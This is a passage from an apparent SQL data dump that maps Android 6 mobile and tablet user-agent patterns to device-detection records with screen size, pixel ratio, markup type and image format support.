AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TONE m15) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TREKKER-M1 CORE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TREKKER-X3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TRENDY) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; TURKCELL T70) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tank Xtreme 4.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tank Xtreme 5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tele2 Maxi) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tele2 Midi) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tele2_Maxi_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tele2_Maxi_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tele2_Midi_1.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tele2_Midi_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tele2_Mini_1_1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Telenor_Smart_4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Telma F1+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tesla SP3.2 Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Thrill Boost) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Thunder) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Tiger) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Turbo-X_e3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Turbo-X_z) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Twist Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Twister5.0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U FEEL ECOM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U FEEL FAB) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U FEEL GO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U FEEL LITE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U FEEL PRIME) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U FEEL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U007 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U008 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U13) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U15 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U15S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U20 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U20) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U7 Max) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; U7 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; ULTRA) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; UMI TOUCH X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; UMI TOUCH) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; UMI_Diamond) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; UP350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ultra Dream) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ultra Link) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ultra Live II) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ultra Shadow) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; Ultra Storm) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; V1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; V17) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; V2_Viper_S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; V2_Viper_X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; V2_Viper_X_plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; V355) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; V7 Zyro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; V75) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VFD 1100) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VFD 1400) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VFD 300) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VFD 301) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VFD 500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.3333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VFD 600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VFD 700) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VFD 900) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VIA_A1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VIA_A1_1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VIA_A1_Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VIA_F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VIE-L09) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VIE-L29) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VIRTUE3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VIVAX_Fly3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VIVO 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VIVO XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VOLT) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VOX A10 3G VS4002PG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VOX Flash 4G VS5015ML) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VOX S505 3G VS5017MG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 6.*; VOX S507 4G VS5022PL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 